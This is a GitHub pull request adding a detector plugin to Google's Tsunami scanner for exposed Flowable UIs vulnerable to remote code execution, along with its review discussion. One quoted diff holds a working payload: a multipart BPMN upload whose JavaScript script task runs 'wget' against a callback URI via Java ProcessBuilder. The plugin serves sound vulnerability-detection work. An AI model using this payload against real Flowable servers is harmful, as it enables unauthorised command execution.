Skip to content

PRP: Flowable Exposed UI RCE#685

Open
devampkid wants to merge 6 commits intogoogle:masterfrom
devampkid:Flowable_exposed_ui
Open

PRP: Flowable Exposed UI RCE#685
devampkid wants to merge 6 commits intogoogle:masterfrom
devampkid:Flowable_exposed_ui

Conversation

@devampkid
Copy link
Contributor

@devampkid devampkid commented Aug 13, 2025

Hello, this is related to #675

find the testbed here: https://github.com/google/security-testbeds/pull/156/files

@devampkid
Flowable exposed UI
52c7145 
It seems that test cases has a bug and i can't finish one test case after numerous efforts
tooryx
tooryx reviewed Aug 13, 2025
View reviewed changes
@tooryx tooryx linked an issue Aug 27, 2025 that may be closed by this pull request
PRP: flowable None RCE #675
Open
giacomo-doyensec
giacomo-doyensec reviewed Oct 3, 2025
View reviewed changes
Copy link
Collaborator

@giacomo-doyensec giacomo-doyensec left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hello @devampkid, thanks for the updates!
You can find a couple of issues to address in the comments below. Feel free to reach out if you have any questions.

@giacomo-doyensec
Copy link
Collaborator

giacomo-doyensec commented Nov 11, 2025

Hello @devampkid, thanks for the updates.
I think the cleanup action should be tied to the action creating the deploy (deploy_tsunami_process) rather than the one executing the RCE (execute_tsunami_process). Please adjust this unless there’s a specific reason for your current implementation.

@tooryx
Copy link
Member

tooryx commented Feb 6, 2026

Hi @devampkid,

Are you still willing to contribute to that change?

Thank you
~tooryx

@devampkid
Copy link
Contributor Author

devampkid commented Feb 8, 2026

Hi @tooryx, I just pushed the requested change.

@robert-doyensec robert-doyensec self-requested a review February 13, 2026 09:17
@robert-doyensec
Copy link
Collaborator

robert-doyensec commented Feb 13, 2026
edited
Loading

@devampkid in the testbed it appears that the vulnerable test case adds a proxy layer which adds the authentication header for the default user. Can you please clarify the circumstances in which authentication will not be required?

@tooryx had asked a similar question at #685 (comment)

@devampkid
Copy link
Contributor Author

devampkid commented Feb 13, 2026

@robert-doyensec I'm sorry about this matter, since it's been a long time i forgot totally about this, and also I only looked at the last comment on the testbed PR, and it seems I made this mistake twice! I will update the testbed shortly

robert-doyensec
robert-doyensec suggested changes Feb 20, 2026
View reviewed changes
Copy link
Collaborator

@robert-doyensec robert-doyensec left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Generally looks good and works. Just a couple of small suggestions.

templated/templateddetector/plugins/exposedui/Flowable_ExposedUI.textproto Outdated
headers: [
{ name: "Content-Type" value: "multipart/form-data; boundary=------------------------gxyhRpqEx2dfbXUDrMqEEL" }
]
data: '--------------------------gxyhRpqEx2dfbXUDrMqEEL\r\nContent-Disposition: form-data; name="file"; filename="jsScript.bpmn"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"\nxmlns:flowable="http://flowable.org/bpmn"\ntargetNamespace="Examples">\n\n<process id="jsScriptProcess" name="JavaScript Script Process">\n<startEvent id="start" />\n<sequenceFlow sourceRef="start" targetRef="scriptTask" />\n<scriptTask id="scriptTask" name="Execute Command via JavaScript"\nscriptFormat="javascript"\nflowable:autoStoreVariables="true">\n<script>\nvar ProcessBuilder = Java.type(\'java.lang.ProcessBuilder\');\nvar Arrays = Java.type(\'java.util.Arrays\');\nvar Scanner = Java.type(\'java.util.Scanner\');\n\nvar processBuilder = new ProcessBuilder(Arrays.asList(\'wget\', \'{{ T_CBS_URI }}\'));\nvar process = processBuilder.start();\n\nvar scanner = new Scanner(process.getInputStream()).useDelimiter("\\A");\nvar result = scanner.hasNext() ? scanner.next() : "";\n\nexecution.setVariable(\'commandOutput\', result);\n</script>\n</scriptTask>\n<sequenceFlow sourceRef="scriptTask" targetRef="end" />\n<endEvent id="end" />\n</process>\n\n</definitions>\n\r\n--------------------------gxyhRpqEx2dfbXUDrMqEEL--\r\n'
Copy link
Collaborator

@robert-doyensec robert-doyensec Feb 20, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can you move the script portion into a workflow variable called "payload" for clarity and debugging later? Ideally just the part between <script> and </script>.

@robert-doyensec
Copy link
Collaborator

robert-doyensec commented Feb 25, 2026

LGTM - Approved
@tooryx , this can be merged alongside with google/security-testbeds#156
Reviewer: Robert, Doyensec
Plugin: Flowable Exposed UI RCE
Drawbacks: None

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@tooryx tooryx tooryx left review comments

+2 more reviewers

@giacomo-doyensec giacomo-doyensec giacomo-doyensec left review comments

@robert-doyensec robert-doyensec robert-doyensec requested changes

Reviewers whose approvals may not affect merge requirements

Assignees

@devampkid devampkid

Labels

lgtm templated

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

PRP: flowable None RCE

4 participants

@devampkid @giacomo-doyensec @tooryx @robert-doyensec